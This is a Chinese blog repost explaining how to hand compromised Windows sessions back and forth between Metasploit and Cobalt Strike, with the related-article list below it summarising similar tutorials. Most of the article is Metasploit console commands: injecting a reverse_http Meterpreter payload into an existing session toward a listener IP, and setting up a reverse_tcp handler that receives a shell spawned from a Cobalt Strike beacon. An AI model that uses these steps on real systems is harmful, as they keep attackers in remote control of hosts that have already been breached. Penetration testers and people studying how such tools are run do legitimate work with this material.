metasploit与Cobaltstrike互相派生shell

最新推荐文章于 2020-10-28 16:12:28 发布
最新推荐文章于 2020-10-28 16:12:28 发布
阅读量318 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/test404/p/10599981.html
版权

msf 派生 shell 给 Cobalt strike(前提有一个meterpreter)

msf exploit(handler) >  use exploit/windows/local/payload_inject
  msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
  msf exploit(payload_inject) > set DisablePayloadHandler true
  msf exploit(payload_inject) > set LHOST 192.168.229.143
  msf exploit(payload_inject) > set LPORT 1212
  msf exploit(payload_inject) > set SESSION 1
  msf exploit(payload_inject) > exploit

Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

之后使用Cobalt Strike创建一个

windows/foreign/reverse_tcp Listener

其中ip为msf的ip地址,端口为msf所监听的端口。
然后选中计算机,右键->Spawn,选择刚刚创建的监听器:
msf中即可看到成功获取了meterpreter会话

 

转载于:https://www.cnblogs.com/test404/p/10599981.html

weixin_30609331
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CS4.9.1.1-CobaltStrike4.9.1.1版
01-18
自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息...
CS会话派生MSF会话
weixin_43047908的博客
08-16 1581
目录前言环境设置外部监听msf建立监听CS派生会话msf的shell传给CS 前言 有时候,我们通过cs拿到一些机器的shell,想利用msf中的一些功能,这个时候,需要我们将shell传给msf之中,这也是本文的主要内容。 另外,msf也可以将shell传给CS。但是因为CS拿shell比较方便,所以,多数情况下是CS传给MSF。 环境设置 我们cs已经拿下一台机器的shell。不在过多赘述。 外部监听 msf建立监听 注意,“ lhost ”是指本机IP的意思;“ rhost ”才是目标机器的IP
Cobalt Strike之与msf互相派生shell
shy的博客
10-28 2876
一,msf派生shell给cobalstrike 1,cs添加监听器 2,msf上在已经获取到的会话(shell)中注入一个新的payload msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http //cs监听器中相同 msf exploit(payload
Cobalt strike 派生shell给MSF
weixin_45945976的博客
10-22 455
Cobalt strike 派生shell给MSF,前提是要有beaconshell: 在msf使用监听模块,并设置相关选项: use exploit/multi/handle set payload windows/meterpreter/reverse_http set lhost 10.6.18.56 set lport 4321 run -j 回到Cobalt strike中添加监听器payload为 windows/foreign/reverse_httpc,ip为msf的ip监听端口为msf监
Awesome-CobaltStrike-Defence:防钴打击
03-08
除了自身的功能外,Cobalt Strike还利用了其他知名工具(例如Metasploit和Mimikatz)的功能。 钴击MITR TTP 钴打击MITER ATT&CK导航器 狩猎和检测工具 Cobalt Strike团队服务器密码Brute Forcer ...
Cobalt_Strike.zip
05-09
Cobalt Strike是一款常用于后渗透的神器,这个工具以团队作为主体,共享信息,拥有多种协议上线方式,集成了端口转发,端口扫描,...除去自身功能外,Cobalt Strike还利用了Metasploit和Mimikatz等其他知名工具的功能。
Cobalt Strike v2.1至尊.zip
10-16
Armitage是一款Java写的Metasploit图形界面的攻击软件,可以用它...bt5、kali linx 下集成免费版本Armitage,Cobalt Strike是它的商业版本,乃们懂得,图形界面非常友好,一键傻瓜化使用MSF高级功能,自动攻击测试。
taowu-cobalt-strike-3.0
01-08
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击...
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell
limb0的博客
12-07 1547
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell 实验环境 系统 IP地址 CS(服务器/客户端) kali 192.168.134.130 靶机 win7 192.168.134.135 MSF kali 192.168.134.138 ...
MSF和CobaltStrike联动
热门推荐
谢公子的博客
09-09 1万+
目录 当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell 当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell 当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell 在MSF上的操作: use exploit/multi/handler set payload windows/...
对Cobalt Strike的安装
cxk
04-09 1336
将下载好的东西图中东西放服务器上 Linux安装Java环境 将下载好的Java安装包解压到/bin目录 然后修改vim /etc/profile export JAVA_HOME=/bin/jdk1.8.0_91 export CLASSPATH=. : ${JAVA_HOME}/lib(注意空格) export PATH=JAVAHOME/bin:{JAVA_HOME}/bin:JAVAH...
内网穿透及端口转发(下)
迷风小白
12-23 2422
0x05 ICMP隧道 注意:在搭建ICMP隧道的时候切记把自身的icmp关闭 (sysctl -w net.ipv4.icmp_echo_ignore_all=1) ptunnel ptunnel,全称“Ping Tunnel”,利用ICMP协议构建通信隧道,实现端到端通信。 网络环境拓扑: B、C上需要装ptunnel工具,因为这里A只能ping通B,所以让B作为server,即ICMP跳板...
cs162 -shell的fork调试
uniquebby的博客
04-04 386
使用gdb调试的时候,gdb只能跟踪一个进程。 可以在fork函数调用之前,通过指令设置gdb调试工具跟踪父进程或子进程。 默认情况下gdb是跟踪父进程的。 set follow-fork-mode child 命令设置gdb在fork之后跟踪子进程。 set follow-fork-mode parent设置跟踪父进程。 https://blog.csdn.net/y3...
metasploit文件格式漏洞渗透攻击(成功获得shell
天元喜羊羊的博客
05-14 7099
环境BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t
metasploit文件格式漏洞渗透攻击(失败)
天元喜羊羊的博客
05-13 5356
root@bt:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|`.""'. II 6. .P : .' / | `. : II 'T;. .;P' '.' / | `.' II 'T; ;P' `. / |
vmware解锁macos模块遇到的问题(linux)
梦之序章的博客
03-18 594
少年们,你们想虚拟机装macos吗? 想的美! 网上一搜一大片教程,的确没问题大致步骤就这样。 但教程是死的,情况一变就出问题了,关于如何解锁就不多说了, 解锁脚本:https://github.com/theJaxon/unlocker 别人的东西不是为你量身订做的,所以很多人解锁的时候会出现很多问题,我也看了看比如: (这个在上面给的链接中不会出现,往往是版本老点的解锁脚本,新的vm后缀都是...
Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转
J0o1ey Blog
01-19 2631
0x001-Cobaltstrike与MSF会话互转 ①Metasploit派生shellCobaltstrike 首先,你需要拿到一个metepreter会话,本例中session为1 Cobaltstrike的teamserver的ip为8.8...
简述Metasploit和Cobalt Strike生成木马的过程
最新发布
03-25
好的,Metasploit和Cobalt Strike都是用于生成木马的工具,它们通常使用漏洞来实现攻击。具体来说,Metasploit的流程大致是这样的:首先,Metasploit生成一系列payloads,这些payloads是一段特殊的代码,可以在目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值